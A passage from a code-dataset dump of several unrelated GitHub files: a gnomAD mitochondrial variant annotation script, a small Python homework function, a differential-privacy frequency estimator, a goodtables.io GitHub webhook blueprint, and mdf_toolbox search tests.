for variants in two genes, with two consequences\n matches_annotations[POS, REF, ALT, SYMBOL] = (\n max_hl,\n info[\"AN\"],\n info[\"AC_hom\"],\n info[\"AC_het\"],\n info[\"AF_hom\"],\n info[\"AF_het\"],\n info[\"faf_hapmax_hom\"],\n VARIANT_CLASS,\n SYMBOL,\n BIOTYPE,\n Consequence,\n Protein_position,\n HGVSc,\n HGVSp,\n all_het,\n haplos,\n max_hap_AF_hom,\n max_pop_AF_hom,\n )\n\n # for max heteroplasmy at codon, for SNVs only\n # to catch variants where one consequence but not other is protein-changing\n if (\n (BIOTYPE == \"protein_coding\")\n and (VARIANT_CLASS == \"SNV\")\n and (Consequence != \"synonymous_variant\")\n ):\n if (not (SYMBOL, Protein_position) in matches_codon) or (\n matches_codon[(SYMBOL, Protein_position)] < max_hl\n ):\n matches_codon[(SYMBOL, Protein_position)] = max_hl\n\n # tRNA in silicos in VCF\n # to catch variants in two different tRNA genes\n if (BIOTYPE == \"Mt_tRNA\") and (VARIANT_CLASS == \"SNV\"):\n if not (SYMBOL, POS, ALT) in matches_insilico:\n matches_insilico[(SYMBOL, POS, ALT)] = (\n info[\"mitotip_trna_prediction\"],\n info[\"pon_mt_trna_prediction\"],\n )\n\n return (matches_annotations, matches_base, matches_codon, matches_insilico)\n\n\n\"\"\"now generate 'reformated.vcf', which is used to produce fig5, fig6, figS5d, figS7, figS8 and table S3\nthis includes the above gathered annotations from gnomAD VCF and other sources\"\"\"\n\n\ndef write_file_for_figures(\n matches_annotations: Dict[\n Tuple[str, str, str, str],\n Tuple[\n str,\n str,\n str,\n str,\n str,\n str,\n str,\n str,\n str,\n str,\n str,\n str,\n str,\n str,\n list,\n list,\n str,\n str,\n ],\n ],\n matches_disease: Dict[Tuple[str, str, str], Tuple[str, str, str, str]],\n matches_base: Dict[str, str],\n matches_codon: Dict[Tuple[str, str], str],\n matches_insilico: Dict[Tuple[str, str, str], Tuple[str, str]],\n matches_apogee: Dict[Tuple[str, str, str, str], str],\n matches_hmtvar: Dict[Tuple[str, str, str], str],\n gnomAD_path: str,\n):\n \"\"\"Generate a VCF of all variants observed in gnomAD, with annotations that can be easily parsed for figure generation.\n\n :param matches_annotations: dictionary linking gnomAD variants to relevant VCF annotations, produced by parse_vcf function\n :param matches_disease: dictionary containing all reported disease-associated variants in MITOMAP, produced by in_mitomap function\n :params matches_insilico, matches_apogee, matches_hmtvar: dictionaries with in silicos predictions of each variant, produced by parse_vcf, apogee and hmtvar_annotations functions\n :params matches_base, matches_codon: dictionaries with maximum heteroplasmy observed at each base and codon in gnomAD, produced by parse_vcf function\n :param gnomAD_path: path to the gnomAD VCF\n \"\"\"\n with gzip.open(\n gnomAD_path + \"t21/sample_annotations_gnomad.vcf.bgz\", mode=\"rt\"\n ) as tsv_file:\n vcf = csv.reader(tsv_file, delimiter=\"\\t\")\n\n file = open(\"reformated.vcf\", \"w\")\n header = \"POS\tREF\tALT\tmax_hl\tAN\tAC_hom\tAC_het\tAF_hom\tAF_het\tfaf_hapmax_hom\tVARIANT_CLASS\tSYMBOL\tBIOTYPE\tConsequence\tProtein_position\tHGVSc\tHGVSp\tall_hl\tall_haplogroups\tmax_hap_AF_hom\tmax_pop_AF_hom\tmax_hl_SNV_base\tmax_hl_nonsyn_SNV_codon\tMitomap_dz_status\tMitomap_dz_heteroplasmy\tMitomap_dz_homoplasmy\tMitomap_disease\tAPOGEE\tMitotip\tPon_mt_trna\tHmtvar\"\n file.write(header + \"\\n\")\n\n for row in vcf:\n if not row[0].startswith(\"#\"):\n if row[6] == \"PASS\": # pass only sites\n POS = row[1]\n REF = row[3]\n ALT = row[4]\n vep = row[7].split(\"vep=\")[1].split(\";\")[0]\n SYMBOL = vep.split(\"|\")[3]\n Protein_position = vep.split(\"|\")[14]\n\n if (\n POS in matches_base\n ): # this is the maximum heteroplasmy of a SNV at each base\n max_base = matches_base[POS]\n else:\n max_base = 0\n\n if (\n SYMBOL,\n Protein_position,\n ) in matches_codon: # this is the maximum heteroplasmy of a non-synonymous SNV at each codon in protein-coding genes\n max_codon = matches_codon[(SYMBOL, Protein_position)]\n else:\n max_codon = 0\n\n if (\n POS,\n REF,\n ALT,\n ) in matches_disease: # this is MITOMAP disease-associated variant\n mitomap_status = matches_disease[(POS, REF, ALT)][0]\n mitomap_het = matches_disease[(POS, REF, ALT)][1]\n mitomap_hom = matches_disease[(POS, REF, ALT)][2]\n mitomap_dz = matches_disease[(POS, REF, ALT)][3]\n else:\n mitomap_status = mitomap_het = mitomap_hom = mitomap_dz = \"\"\n\n if (\n SYMBOL,\n POS,\n ALT,\n ) in matches_insilico: # this is tRNA in silicos from the gnomAD VCF\n mitotip = matches_insilico[(SYMBOL, POS, ALT)][0]\n pon_mt = matches_insilico[(SYMBOL, POS, ALT)][1]\n else:\n mitotip = pon_mt = \"\"\n\n if (\n POS,\n REF,\n ALT,\n SYMBOL,\n ) in matches_apogee: # this is additional in silico for non-synonymous variants\n apogee = matches_apogee[(POS, REF, ALT, SYMBOL)]\n else:\n apogee = \"\"\n\n if ((POS, REF, ALT) in matches_hmtvar) and (\n SYMBOL.startswith(\"MT-T\")\n ): # this is additional in silico for tRNA variants\n hmtvar = matches_hmtvar[(POS, REF, ALT)]\n else:\n hmtvar = \"\"\n\n file.write(\n str(POS)\n + \"\\t\"\n + str(REF)\n + \"\\t\"\n + str(ALT)\n + \"\\t\"\n + \"\\t\".join(\n str(x) for x in matches_annotations[POS, REF, ALT, SYMBOL]\n )\n + \"\\t\"\n + str(max_base)\n + \"\\t\"\n + str(max_codon)\n + \"\\t\"\n + str(mitomap_status)\n + \"\\t\"\n + str(mitomap_het)\n + \"\\t\"\n + str(mitomap_hom)\n + \"\\t\"\n + str(mitomap_dz)\n + \"\\t\"\n + str(apogee)\n + \"\\t\"\n + str(mitotip)\n + \"\\t\"\n + str(pon_mt)\n + \"\\t\"\n + str(hmtvar)\n + \"\\n\"\n )\n\n if (\n vep.count(\"|\") > 44\n ): # if two annotations, variant lies in two genes\n SYMBOL = vep.split(\"|\")[48]\n Protein_position = vep.split(\"|\")[59]\n\n if (\n SYMBOL,\n Protein_position,\n ) in matches_codon: # this is the maximum heteroplasmy of a non-synonymous SNV at each codon in protein-coding genes\n max_codon = matches_codon[(SYMBOL, Protein_position)]\n else:\n max_codon = 0\n\n if (\n SYMBOL,\n POS,\n ALT,\n ) in matches_insilico: # this is tRNA in silicos from the gnomAD VCF\n mitotip = matches_insilico[(SYMBOL, POS, ALT)][0]\n pon_mt = matches_insilico[(SYMBOL, POS, ALT)][1]\n else:\n mitotip = pon_mt = \"\"\n\n if (\n POS,\n REF,\n ALT,\n SYMBOL,\n ) in matches_apogee: # this is additional in silico for non-synonymous variants\n apogee = matches_apogee[(POS, REF, ALT, SYMBOL)]\n else:\n apogee = \"\"\n\n if ((POS, REF, ALT) in matches_hmtvar) and (\n SYMBOL.startswith(\"MT-T\")\n ): # this is additional in silico for tRNA variants\n hmtvar = matches_hmtvar[(POS, REF, ALT)]\n else:\n hmtvar = \"\"\n\n file.write(\n str(POS)\n + \"\\t\"\n + str(REF)\n + \"\\t\"\n + str(ALT)\n + \"\\t\"\n + \"\\t\".join(\n str(x)\n for x in matches_annotations[POS, REF, ALT, SYMBOL]\n )\n + \"\\t\"\n + str(max_base)\n + \"\\t\"\n + str(max_codon)\n + \"\\t\"\n + str(mitomap_status)\n + \"\\t\"\n + str(mitomap_het)\n + \"\\t\"\n + str(mitomap_hom)\n + \"\\t\"\n + str(mitomap_dz)\n + \"\\t\"\n + str(apogee)\n + \"\\t\"\n + str(mitotip)\n + \"\\t\"\n + str(pon_mt)\n + \"\\t\"\n + str(hmtvar)\n + \"\\n\"\n )\n\n\n\"\"\"now generate a second output file 'annotated_synthetic.vcf', which is used to produce table S4\nfirst use a VEP annotated synthetic VCF for all possible SNVs in the mtDNA to create dictionaries of the consequences and locus of each possible SNV\ngather allele frequency and maximum heteroplasmy data from HelixMTdb for annotating, also annoate with MITOMAP allele frequency and disease-assocated variants gathered above\"\"\"\n\n\ndef consequences(synthetic_vcf_path: str):\n \"\"\"Create dictionaries of the VEP consequences and locus of every possible single nucleotide variant in the mtDNA.\n\n :param synthetic_vcf_path: path to the VEP annotated synthetic VCF output of split_vars_two_genes.py\n :return: matches_locus, matches_conseq, matches_HGVSc, matches_HGVSp dictionaries linking relavant annotations to every base or variant\n \"\"\"\n with open(\n synthetic_vcf_path + \"NC_012920.1_synthetic_vep_splitvarstwogenes.vcf\"\n ) as vcf: # this file has been edited so that for variants in two genes, the consequence on each gene is listed on a separate line using split_vars_two_genes.py\n vcf = csv.DictReader(vcf, delimiter=\"\\t\")\n\n matches_locus = {} # gene name\n matches_conseq = {} # ie synonymous, missense, etc\n matches_HGVSp = {} # HGVSp\n matches_HGVSc = {} # HGVSc\n\n for row in vcf:\n base = str(row[\"POS\"])\n alt = row[\"ALT\"]\n gene = row[\"SYMBOL\"]\n\n if not base in matches_locus:\n matches_locus[base] = []\n if gene: # ie if base lies in a gene\n matches_locus[base] = [gene]\n else:\n matches_locus[base] = [\"non-coding\"]\n else: # if base lies in two genes\n if not gene:\n gene = \"non-coding\"\n if (\n not gene in matches_locus[base]\n ): # so only adding different gene names\n matches_locus[base].append(gene)\n\n if (\n not (base, alt) in matches_conseq\n ): # every base position will have a consequence\n matches_conseq[(base, alt)] = [row[\"Consequence\"]]\n else:\n matches_conseq[(base, alt)].append(row[\"Consequence\"])\n\n if not (base, alt) in matches_HGVSp:\n matches_HGVSp[(base, alt)] = [row[\"HGVSp\"]]\n else:\n matches_HGVSp[(base, alt)].append(row[\"HGVSp\"])\n\n if not (base, alt) in matches_HGVSc:\n matches_HGVSc[(base, alt)] = [row[\"HGVSc\"]]\n else:\n matches_HGVSc[(base, alt)].append(row[\"HGVSc\"])\n\n return (matches_locus, matches_conseq, matches_HGVSc, matches_HGVSp)\n\n\ndef in_helix(other_databases_path: str):\n \"\"\"Extract allele frequency and maximum heteroplasmy data from the HelixMTdb database.\n\n :param other_databases_path: path to the other_databases directory with required file\n :return: helix_counts dictionary with relevant annotations for all observed variants\n \"\"\"\n with open(other_databases_path + \"HelixMTdb_20200327.tsv\") as csv_file:\n var_list = csv.DictReader(csv_file, delimiter=\"\\t\")\n\n helix_counts = {}\n\n for row in var_list:\n pos = str(row[\"locus\"].split(\"chrM:\")[1])\n ref = str(row[\"alleles\"].split('\"')[1])\n alt = str(row[\"alleles\"].split('\"')[3])\n\n if float(row[\"AF_hom\"]) > 0:\n max_het = float(1)\n elif float(row[\"AF_hom\"]) == 0:\n max_het = float(row[\"max_ARF\"])\n\n helix_counts[pos, ref, alt] = (\n max_het,\n float(row[\"AF_hom\"]),\n float(row[\"AF_het\"]),\n )\n\n return helix_counts\n\n\ndef annotate_syn_vcf(\n matches_annotations: Dict[\n Tuple[str, str, str, str],\n Tuple[\n str,\n str,\n str,\n str,\n str,\n str,\n str,\n str,\n str,\n str,\n str,\n str,\n str,\n str,\n list,\n list,\n str,\n str,\n ],\n ],\n helix_counts: Dict[Tuple[str, str, str], Tuple[float, float, float]],\n mitomap_counts: Dict[Tuple[str, str, str], float],\n matches_locus: Dict[str, str],\n matches_conseq: Dict[Tuple[str, str], str],\n matches_HGVSc: Dict[Tuple[str, str], str],\n matches_HGVSp: Dict[Tuple[str, str], str],\n synthetic_vcf_path: str,\n):\n \"\"\"Generate a VCF of all possible SNVs in the mtDNA, with annotations that can be easily parsed for table generation.\n\n :param matches_annotations: dictionary linking gnomAD variants to relevant VCF annotations, produced by parse_vcf function\n :param helix_counts: dictionary with relevant annotations for all observed variants in HelixMTdb, produced by in_helix function\n :param mitomap_counts: dictionary with relevant annotations for all observed variants in MITOMAP, produced by in_mitomap function\n :params matches_locus, matches_conseq, matches_HGVSc, matches_HGVSp: dictionaries linking relavant annotations to every base or variant, produced by consequences function\n :param synthetic_vcf_path: path to the VEP annotated synthetic VCF\n \"\"\"\n with open(synthetic_vcf_path + \"NC_012920.1_synthetic_vep.vcf\") as csv_file:\n synt_vcf = csv.reader(csv_file, delimiter=\"\\t\")\n\n file = open(\"annotated_synthetic.vcf\", \"w\")\n header = \"POS\tREF\tALT\tSYMBOL\tConsequence\tHGVSc\tHGVSp\tgnomAD_max_hl\tgnomAD_AF_hom\tgnomAD_AF_het\tHelix_max_hl\tHelix_af_hom\tHelix_af_het\tMitomap_af\tMitomap_dz_status\tMitomap_dz_heteroplasmy\tMitomap_dz_homoplasmy\"\n file.write(header + \"\\n\")\n\n for row in synt_vcf:\n if not row[0].startswith(\"#\"):\n POS = row[1]\n REF = row[3]\n ALT = row[4]\n SYMBOL = row[7].split(\"|\")[3]\n if (\n POS,\n REF,\n ALT,\n SYMBOL,\n ) in matches_annotations: # annotations from gnomAD VCF\n in_gnomad_max = matches_annotations[(POS, REF, ALT, SYMBOL)][0]\n in_gnomad_afhom = matches_annotations[(POS, REF, ALT, SYMBOL)][4]\n in_gnomad_afhet = matches_annotations[(POS, REF, ALT, SYMBOL)][5]\n else:\n in_gnomad_max = in_gnomad_afhom = in_gnomad_afhet = 0\n\n if (POS, REF, ALT) in helix_counts: # annotations from HelixMTdb\n in_helix_max = helix_counts[(POS, REF, ALT)][0]\n in_helix_afhom = helix_counts[(POS, REF, ALT)][1]\n in_helix_afhet = helix_counts[(POS, REF, ALT)][2]\n else:\n in_helix_max = in_helix_afhom = in_helix_afhet = 0\n\n if (POS, REF, ALT) in mitomap_counts: # annotations from MITOMAP\n in_mitomap = mitomap_counts[(POS, REF, ALT)]\n else:\n in_mitomap = 0\n\n if (\n POS,\n REF,\n ALT,\n ) in matches_disease: # disease-associated variants from MITOMAP\n mitomap_status = matches_disease[(POS, REF, ALT)][0]\n mitomap_het = matches_disease[(POS, REF, ALT)][1]\n mitomap_hom = matches_disease[(POS, REF, ALT)][2]\n else:\n mitomap_status = mitomap_het = mitomap_hom = \"\"\n\n file.write(\n str(POS)\n + \"\\t\"\n + str(REF)\n + \"\\t\"\n + str(ALT)\n + \"\\t\"\n + str(matches_locus[POS]).strip(\"[]\").replace(\"'\", \"\")\n + \"\\t\"\n + str(matches_conseq[(POS, ALT)]).strip(\"[]\").replace(\"'\", \"\")\n + \"\\t\"\n + str(matches_HGVSc[(POS, ALT)]).strip(\"[]\").replace(\"'\", \"\")\n + \"\\t\"\n + str(matches_HGVSp[(POS, ALT)]).strip(\"[]\").replace(\"'\", \"\")\n + \"\\t\"\n + str(in_gnomad_max)\n + \"\\t\"\n + str(in_gnomad_afhom)\n + \"\\t\"\n + str(in_gnomad_afhet)\n + \"\\t\"\n + str(in_helix_max)\n + \"\\t\"\n + str(in_helix_afhom)\n + \"\\t\"\n + str(in_helix_afhet)\n + \"\\t\"\n + str(in_mitomap)\n + \"\\t\"\n + str(mitomap_status)\n + \"\\t\"\n + str(mitomap_het)\n + \"\\t\"\n + str(mitomap_hom)\n + \"\\n\"\n )\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n\n parser.add_argument(\n \"--other_databases_path\",\n help=\"path to directory with MITOMAP and HelixMTdb files\",\n required=False,\n default=\"final_data_files/other_databases/\",\n )\n parser.add_argument(\n \"--insilicos_path\",\n help=\"path to directory with APOGEE and HmtVar files\",\n required=False,\n default=\"final_data_files/insilicos/\",\n )\n parser.add_argument(\n \"--synthetic_vcf_path\",\n help=\"path to directory with synthetic vcf files\",\n required=False,\n default=\"final_data_files/synthetic_vcf/\",\n )\n parser.add_argument(\n \"--gnomAD_path\",\n help=\"path to directory with gnomAD files (not publicly available)\",\n required=False,\n default=\"final_data_files/gnomAD/\",\n )\n args = parser.parse_args()\n\n print(\n \"Starting!\\nThis script will produce 2 output files: reformated.vcf and annotated_synthetic.vcf, which are the input files for the R scripts used to produce the figures and tables\"\n )\n\n # gather annotations for output \"reformated.vcf\", these are additional insilico and population frequency annotations\n (mitomap_counts, matches_disease) = in_mitomap(args.other_databases_path)\n matches_apogee = apogee(args.insilicos_path)\n matches_hmtvar = hmtvar_annotations(args.insilicos_path)\n print(\n \"gathered annotations!\\nNow will parse the gnomAD data, this might take ~15 minutes\"\n )\n # these are annotations extracted from the gnomAD data\n matches_samples = samples(args.gnomAD_path)\n (matches_annotations, matches_base, matches_codon, matches_insilico) = parse_vcf(\n matches_samples, args.gnomAD_path\n )\n # now write the output file \"reformated.vcf\", which is used to produce fig5, fig6, figS5d, figS7, figS8 and table S3\n write_file_for_figures(\n matches_annotations,\n matches_disease,\n matches_base,\n matches_codon,\n matches_insilico,\n matches_apogee,\n matches_hmtvar,\n args.gnomAD_path,\n )\n print(\n \"written file reformated.vcf!\\nNow will make the second output file annotated_synthetic.vcf\"\n )\n\n # now generate a second output file \"annotated_synthetic.vcf\", which is used to produce table S4, this output needs additional annotations vs \"reformated.vcf\", including from HelixMTdb\n (matches_locus, matches_conseq, matches_HGVSc, matches_HGVSp) = consequences(\n args.synthetic_vcf_path\n )\n helix_counts = in_helix(args.other_databases_path)\n annotate_syn_vcf(\n matches_annotations,\n helix_counts,\n mitomap_counts,\n matches_locus,\n matches_conseq,\n matches_HGVSc,\n matches_HGVSp,\n args.synthetic_vcf_path,\n )\n print(\"written file annotated_synthetic.vcf!\\nScript is now complete\")\n","repo_name":"broadinstitute/gnomad-mitochondria","sub_path":"gnomad_mitochondria/manuscript_analyses/reformat_vcf.py","file_name":"reformat_vcf.py","file_ext":"py","file_size_in_byte":36482,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"60"} +{"seq_id":"10330074911","text":"# Напишіть функцію, що приймає два аргументи. Функція повинна\n# якщо аргументи відносяться до числових типів (int, float) - повернути перемножене значення цих аргументів,\n# якщо обидва аргументи це строки (str) - обʼєднати в одну строку та повернути\n# у будь-якому іншому випадку повернути кортеж з цих аргументів\n\ndef dif_action(arg1, arg2):\n a = None\n if (type(arg1) is int or type(arg1) is float) and (type(arg2) is int or type(arg2) is float):\n return arg1 * arg2\n elif type(arg1) is str and type(arg2) is str:\n return arg1 + arg2\n else:\n return (arg1, arg2)\n\nprint(dif_action(3, 3))\nprint(dif_action('Hello ', 'world'))\nprint(dif_action(3, 'world'))","repo_name":"AnnaKilimova/PythonBasic","sub_path":"HW6/Task2.py","file_name":"Task2.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"uk","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"21838966","text":"import numpy as np\r\nimport math\r\nimport random\r\nimport copy\r\nimport xxhash\r\n\r\ndef olh(data, k, epsilon, delta):\r\n n = len(data)\r\n # compute optimal size of hash domain\r\n m = epsilon**2 * (n-1) / (14 * np.log(2 / delta))\r\n d = np.floor((m + 2) / 3)\r\n \r\n #compute local privacy budget, out of range has no privacy amplification\r\n epsilon_l = epsilon**2 * (n - 1) / (14 * np.log(2 / delta)) + 1 - d\r\n if epsilon_l < 1:\r\n epsilon_l = epsilon\r\n else:\r\n epsilon_l = np.log(epsilon_l)\r\n\r\n p = np.exp(epsilon_l) / (np.exp(epsilon_l) + d - 1)\r\n #q = 1 / (np.exp(epsilon_l) + d - 1)\r\n\r\n for i in range(n):\r\n v = data[i]\r\n x = (xxhash.xxh32(str(v), seed=i).intdigest() % d)\r\n y = x\r\n\r\n if random.random() > p:\r\n while y == x:\r\n y = np.random.randint(0, d)\r\n\r\n data[i] = y\r\n\r\n #estimate randimized data\r\n pre_freq = np.zeros(k, dtype = int)\r\n for i in range(n):\r\n for v in range(k):\r\n if data[i] == (xxhash.xxh32(str(v), seed=i).intdigest() % d):\r\n pre_freq[v] += 1\r\n a = 1.0 * d / (p * d - 1)\r\n b = 1.0 * n / (p * d - 1)\r\n pre_freq = a * pre_freq - b\r\n\r\n return pre_freq\r\n\r\ndef compute_mse(data, k, epsilon, delta, nround):\r\n n = len(data)\r\n error = 0\r\n true_freq = np.bincount(data)\r\n\r\n for r in range(nround):\r\n pre_freq = olh(copy.deepcopy(data), k, epsilon, delta)\r\n error += np.square((true_freq - pre_freq) / n).sum() \r\n error = error / (k * nround)\r\n\r\n return error","repo_name":"noname-w/DUMP","sub_path":"SOLH.py","file_name":"SOLH.py","file_ext":"py","file_size_in_byte":1560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"6543079465","text":"import logging\nfrom flask import Blueprint, request, abort, jsonify\nfrom flask_login import login_required, current_user\nfrom goodtablesio import settings\nfrom goodtablesio.services import database\nfrom goodtablesio.models.internal_job import InternalJob\nfrom goodtablesio.utils.signature import validate_signature\nfrom goodtablesio.integrations.github.models.repo import GithubRepo\nfrom goodtablesio.integrations.github.tasks.repos import sync_user_repos\nfrom goodtablesio.integrations.github.utils.hook import (\n activate_hook, deactivate_hook, get_details_from_hook_payload)\nlog = logging.getLogger(__name__)\n\n\n# Module API\n\ngithub = Blueprint('github', __name__, url_prefix='/github')\n\n\n@github.record\ndef record_params(setup_state):\n github.debug = setup_state.app.debug\n\n\n@github.route('/hook', methods=['POST'])\ndef create_job():\n\n # Validate signature (throws 400 on invalid)\n if not github.debug:\n key = settings.GITHUB_HOOK_SECRET\n text = request.data\n signature = request.headers.get('X-Hub-Signature', '')\n if not validate_signature(key, text, signature):\n msg = 'Wrong signature for GitHub payload'\n log.error(msg)\n abort(400, msg)\n\n # Get payload details (throws 400 if no data or bad JSON)\n payload = request.get_json()\n details = get_details_from_hook_payload(payload)\n if details is None:\n msg = 'Wrong payload received'\n log.error(msg)\n abort(400, msg)\n if details == {}:\n return jsonify({})\n\n # Get source (throw 400 if no source)\n source_owner = details['owner']\n source_repo = details['repo']\n if details['is_pr']:\n source_owner = details['base_owner']\n source_repo = details['base_repo']\n source = database['session'].query(GithubRepo).filter(\n GithubRepo.name == '%s/%s' % (source_owner, source_repo)).one_or_none()\n if not source:\n msg = 'A job was requested on a repository not present in the DB'\n log.error(msg)\n abort(400, msg)\n\n # Create and start job (throw 400 if not started)\n job_id = source.create_and_start_job(conf=details)\n if not job_id:\n msg = 'A job was requested but can\\'t be started'\n log.error(msg)\n abort(400, msg)\n\n return jsonify({'job_id': job_id})\n\n\n# API\n\n# TODO:\n# it should be synced with general\n# approach we use for API (see api blueprint)\n\n@github.route('/api/sync_account')\n@login_required\ndef api_sync_account():\n error = None\n\n # Check syncing status\n if _is_user_repos_syncing(current_user.id):\n error = 'User repos are already syncing'\n\n # Run syncing\n if not error:\n # TODO:\n # Job create/run should be atomic\n # https://github.com/frictionlessdata/goodtables.io/issues/172\n job = InternalJob(name=sync_user_repos.name, user=current_user)\n database['session'].add(job)\n database['session'].commit()\n sync_user_repos.delay(current_user.id, job_id=job.id)\n\n return jsonify({\n 'error': error,\n })\n\n\n@github.route('/api/repo/')\n@login_required\ndef api_repo(repo_id):\n error = None\n repo_data = None\n\n # Get repo\n try:\n repo = (database['session'].query(GithubRepo).\n filter(GithubRepo.users.any(id=current_user.id)).\n filter(GithubRepo.id == repo_id).\n one())\n repo_data = repo.to_api()\n except Exception as exception:\n log.exception(exception)\n abort(403)\n\n return jsonify({\n 'repo': repo_data,\n 'error': error,\n })\n\n\n@github.route('/api/repo')\n@login_required\ndef api_repo_list():\n error = None\n\n # Get repos\n repos = (\n database['session'].query(GithubRepo).\n filter(GithubRepo.users.any(id=current_user.id)).\n order_by(GithubRepo.active.desc(), GithubRepo.name).\n all())\n repos_data = [repo.to_api() for repo in repos]\n\n # Get syncing status\n syncing = _is_user_repos_syncing(current_user.id)\n\n return jsonify({\n 'repos': repos_data,\n 'syncing': syncing,\n 'error': error,\n })\n\n\n@github.route('/api/repo//activate')\n@login_required\ndef api_repo_activate(repo_id):\n error = None\n\n # Get token\n token = current_user.github_oauth_token\n if not token:\n error = 'No valid GitHub token found'\n\n # Get repo\n if not error:\n try:\n repo = (database['session'].query(GithubRepo).\n filter(GithubRepo.users.any(id=current_user.id)).\n filter(GithubRepo.id == repo_id).\n one())\n except Exception as exception:\n log.exception(exception)\n abort(403)\n\n # Activate repo\n if not error:\n try:\n activate_hook(token, repo.owner, repo.repo)\n repo.active = True\n database['session'].commit()\n except Exception as exception:\n error = 'Repo activation error'\n log.exception(exception)\n\n # Validate repo\n if not error:\n repo.create_and_start_job()\n\n return jsonify({\n 'error': error,\n })\n\n\n@github.route('/api/repo//deactivate')\n@login_required\ndef api_repo_deactivate(repo_id):\n error = None\n\n # Get token\n token = current_user.github_oauth_token\n if not token:\n error = 'No valid GitHub token found'\n\n # Get repo\n if not error:\n try:\n repo = (database['session'].query(GithubRepo).\n filter(GithubRepo.users.any(id=current_user.id)).\n filter(GithubRepo.id == repo_id).\n one())\n except Exception as exception:\n log.exception(exception)\n abort(403)\n\n # Deactivate repo\n if not error:\n try:\n deactivate_hook(token, repo.owner, repo.repo)\n repo.active = False\n database['session'].commit()\n except Exception as exception:\n log.exception(exception)\n error = 'Repo deactivation error'\n\n return jsonify({\n 'error': error,\n })\n\n\n# Internal\n\ndef _is_user_repos_syncing(user_id):\n return bool(\n database['session'].query(InternalJob).\n filter_by(\n name=sync_user_repos.name,\n user_id=user_id,\n finished=None).\n count())\n","repo_name":"AntoineAugusti/goodtables.io","sub_path":"goodtablesio/integrations/github/blueprint.py","file_name":"blueprint.py","file_ext":"py","file_size_in_byte":6348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"60"} +{"seq_id":"10938846284","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution:\n def distanceK(self, root: TreeNode, target: TreeNode, k: int) -> List[int]:\n \n graph = defaultdict(list)\n def construct(root, parent):\n\n if root and parent:\n graph[root.val].append(parent.val)\n graph[parent.val].append(root.val)\n \n if root.left:\n construct(root.left, root)\n \n if root.right:\n construct(root.right, root)\n \n construct(root, parent=None)\n res = []\n queue = deque([(target.val, 0)])\n visited = set([target.val])\n while queue:\n\n start, level = queue.popleft()\n if level == k:\n res.append(start)\n continue\n \n if level > k:\n break\n \n for nei in graph[start]:\n if nei not in visited:\n visited.add(nei)\n queue.append((nei, level + 1))\n \n return res","repo_name":"GelilaT/competitive_programming","sub_path":"all-nodes-distance-k-in-binary-tree.py","file_name":"all-nodes-distance-k-in-binary-tree.py","file_ext":"py","file_size_in_byte":1165,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"44581457550","text":"import pytest\nimport re, os\n\nimport mdf_toolbox\n\n\nSEARCH_LIMIT = 10\n\n#github specific declarations\nclient_id = os.getenv('CLIENT_ID')\nclient_secret = os.getenv('CLIENT_SECRET')\non_github = os.getenv('GITHUB_ACTIONS') is not None\n\non_github = True\n\nauths = mdf_toolbox.confidential_login(client_id=client_id,\n client_secret=client_secret,\n services=['search'], make_clients=True)\nSEARCH_CLIENT = auths['search']\n\nINDEX = \"mdf\"\nSCROLL_FIELD = \"mdf.scroll_id\"\n\n\nclass DummyClient(mdf_toolbox.AggregateHelper, mdf_toolbox.SearchHelper):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, scroll_field=SCROLL_FIELD, **kwargs)\n\n\n# Helper\n# Return codes:\n# -1: No match, the value was never found\n# 0: Exclusive match, no values other than argument found\n# 1: Inclusive match, some values other than argument found\n# 2: Partial match, value is found in some but not all results\ndef check_field(res, field, regex):\n if on_github: return True\n \n dict_path = \"\"\n for key in field.split(\".\"):\n if key == \"[]\":\n dict_path += \"[0]\"\n else:\n dict_path += \".get('{}', {})\".format(key, \"{}\")\n # If no results, set matches to false\n all_match = (len(res) > 0)\n only_match = (len(res) > 0)\n some_match = False\n for r in res:\n vals = eval(\"r\"+dict_path)\n if vals == {}:\n vals = []\n elif type(vals) is not list:\n vals = [vals]\n # If a result does not contain the value, no match\n if regex not in vals and not any([re.search(str(regex), value) for value in vals]):\n all_match = False\n only_match = False\n # If a result contains other values, inclusive match\n elif len(vals) != 1:\n only_match = False\n some_match = True\n else:\n some_match = True\n\n if only_match:\n # Exclusive match\n return 0\n elif all_match:\n # Inclusive match\n return 1\n elif some_match:\n # Partial match\n return 2\n else:\n # No match\n return -1\n\n\ndef test_aggregate_internal(capsys):\n if on_github: return True\n \n q = DummyClient(index=INDEX, search_client=SEARCH_CLIENT, advanced=True)\n # Error on no query\n with pytest.raises(AttributeError):\n q.aggregate()\n\n # Basic aggregation\n res1 = q.aggregate(\"mdf.source_name:nist_xps_db\")\n assert len(res1) > 10000\n assert isinstance(res1[0], dict)\n\n # Multi-dataset aggregation\n q._SearchHelper__query[\"q\"] = \"(mdf.source_name:nist_xps_db OR mdf.source_name:khazana_vasp)\"\n res2 = q.aggregate()\n assert len(res2) > 10000\n assert len(res2) > len(res1)\n\n # Unnecessary aggregation fallback to .search()\n # Check success in Coveralls\n q._SearchHelper__query[\"q\"] = \"mdf.source_name:khazana_vasp\"\n assert len(q.aggregate()) < 10000\n\n\ndef test_aggregate_external():\n # Test that aggregate uses the current query properly\n # And returns results\n # And respects the reset_query arg\n \n if on_github: return True\n \n f = DummyClient(INDEX, search_client=SEARCH_CLIENT)\n f.match_field(\"mdf.source_name\", \"nist_xps_db\")\n res1 = f.aggregate(reset_query=False, index=\"mdf\")\n assert len(res1) > 10000\n assert check_field(res1, \"mdf.source_name\", \"nist_xps_db\") == 0\n res2 = f.aggregate()\n assert len(res2) == len(res1)\n assert check_field(res2, \"mdf.source_name\", \"nist_xps_db\") == 0\n","repo_name":"materials-data-facility/toolbox","sub_path":"tests/test_sub_helpers.py","file_name":"test_sub_helpers.py","file_ext":"py","file_size_in_byte":3533,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"60"} +{"seq_id":"38922049942","text":"import json\n\nimport random\ndef find_all_station():\n\n with 